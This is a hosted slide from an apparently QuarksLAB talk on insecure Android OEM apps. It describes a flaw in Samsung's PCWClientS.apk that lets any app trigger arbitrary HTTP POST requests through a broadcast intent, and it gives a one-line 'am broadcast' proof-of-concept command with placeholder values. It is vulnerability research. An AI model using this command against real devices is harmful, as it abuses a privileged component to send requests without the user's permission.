Android OEM's applications (in)security and backdoors ... - QuarksLAB
13.04.2015 Views
Share Embed Flag

Android OEM's applications (in)security and backdoors ... - QuarksLAB

Android OEM's applications (in)security and backdoors ... - QuarksLAB

Android OEM's applications (in)security and backdoors ... - QuarksLAB

SHOW MORE
SHOW LESS
ePAPER READ
DOWNLOAD ePAPER
quarkslab.com

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

START NOW

<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />

Arbitrary HTTP requests execution<br />

Vuln2 - PCWClientS.apk<br />

PCWReceiver<br />

When an Intent is received with<br />

com.sec.pcw.device.HTTP_REQUEST_RETRY as action<br />

The body, uri <strong>and</strong> pushType attributed are extracted <strong>and</strong> an<br />

HTTP POST request is executed based on it<br />

PoC<br />

shell@<strong>and</strong>roid:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri<br />

*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*

logo

products

Resources

Company

Terms of service
Privacy policy
Cookie policy
Cookie settings
Imprint
Change language
Made with love in Switzerland
© 2024 Yumpu.com all rights reserved

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!